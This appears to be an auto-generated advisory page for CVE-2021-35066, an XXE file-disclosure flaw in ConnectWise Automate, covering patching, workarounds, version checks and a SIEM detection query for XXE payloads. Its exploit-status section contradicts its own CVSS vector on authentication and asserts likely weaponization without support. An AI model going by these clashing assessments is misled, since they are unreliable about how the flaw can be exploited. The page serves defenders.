CVE-2021-35066 – This CVE describes an XML External Entity (XXE)... (How to Fix)

Q: What is the severity of CVE-2021-35066?

CVE-2021-35066 has a CVSS score of 9.8 (CRITICAL). This CVE describes an XML External Entity (XXE) vulnerability in ConnectWise Automate that allows attackers to read arbitrary files from the server filesystem. It affects ConnectWise Automate installations before version 2021.0.6.132. Organizations using vulnerable versions of this remote monitoring and management software are at risk.

📋 TL;DR

This CVE describes an XML External Entity (XXE) vulnerability in ConnectWise Automate that allows attackers to read arbitrary files from the server filesystem. It affects ConnectWise Automate installations before version 2021.0.6.132. Organizations using vulnerable versions of this remote monitoring and management software are at risk.

💻 Affected Systems

Products:

ConnectWise Automate

Versions: All versions before 2021.0.6.132

Operating Systems: Windows Server (primary deployment platform)

Default Config Vulnerable: ⚠️ Yes

Notes: All default installations of affected versions are vulnerable. No special configuration required for exploitation.

📦 What is this software?

Automate by Connectwise

View all CVEs affecting Automate →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete server compromise allowing attackers to read sensitive files, potentially including configuration files with credentials, leading to lateral movement and full network access.

🟠

Likely Case

Unauthorized file disclosure including configuration files, logs, and potentially sensitive data stored on the server.

🟢

If Mitigated

Limited impact with proper network segmentation and file system permissions, though sensitive data exposure may still occur.

🌐 Internet-Facing: HIGH - ConnectWise Automate is often exposed to the internet for remote management, making it accessible to attackers.

🏢 Internal Only: MEDIUM - Internal attackers or compromised internal systems could exploit this vulnerability.

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

XXE vulnerabilities typically have low exploitation complexity. While no public PoC exists, the vulnerability type is well-understood and likely weaponized in targeted attacks.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2021.0.6.132 or later

Vendor Advisory: https://home.connectwise.com/securityBulletin/60cc8c63508a120001cb6e8d

Restart Required: Yes

Instructions:

1. Backup your ConnectWise Automate installation and database. 2. Download the latest patch from ConnectWise portal. 3. Run the installer with administrative privileges. 4. Restart the ConnectWise Automate services. 5. Verify the update completed successfully.

🔧 Temporary Workarounds

Disable XML external entity processing

all

Configure XML parsers to disable external entity resolution

Configuration depends on specific XML parser implementation. Consult ConnectWise documentation for parser-specific settings.

Network segmentation

all

Restrict network access to ConnectWise Automate server

Implement firewall rules to limit inbound connections to trusted IP addresses only

🧯 If You Can't Patch

Implement strict network access controls to limit who can reach the ConnectWise Automate interface
Monitor file access logs for unusual read patterns and implement file integrity monitoring

🔍 How to Verify

Check if Vulnerable:

Check the ConnectWise Automate version in the web interface under Help > About, or examine the installed version in Programs and Features (Windows).

Check Version:

In ConnectWise Automate web interface: Navigate to Help > About. On Windows server: Check Programs and Features or registry at HKEY_LOCAL_MACHINE\SOFTWARE\LabTech\Install

Verify Fix Applied:

Verify the version is 2021.0.6.132 or later in the web interface or installed programs list.

📡 Detection & Monitoring

Log Indicators:

Unusual XML parsing errors in application logs
Multiple failed XML parsing attempts
File read operations from unexpected processes

Network Indicators:

XML payloads containing external entity references in HTTP requests
Outbound connections from ConnectWise server to unexpected external IPs

SIEM Query:

source="connectwise-automate" AND (message="*XXE*" OR message="*external entity*" OR message="*DOCTYPE*")

📊 Metadata

CVE ID: CVE-2021-35066

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-611

Published: June 21, 2021

Last Updated: November 21, 2024

🔗 References

https://home.connectwise.com/securityBulletin/60cc8c63508a120001cb6e8d Permissions Required,Vendor Advisory
https://www.connectwise.com/company/trust/security-bulletins Vendor Advisory
https://home.connectwise.com/securityBulletin/60cc8c63508a120001cb6e8d Permissions Required,Vendor Advisory
https://www.connectwise.com/company/trust/security-bulletins Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-35066, you might also want to check these: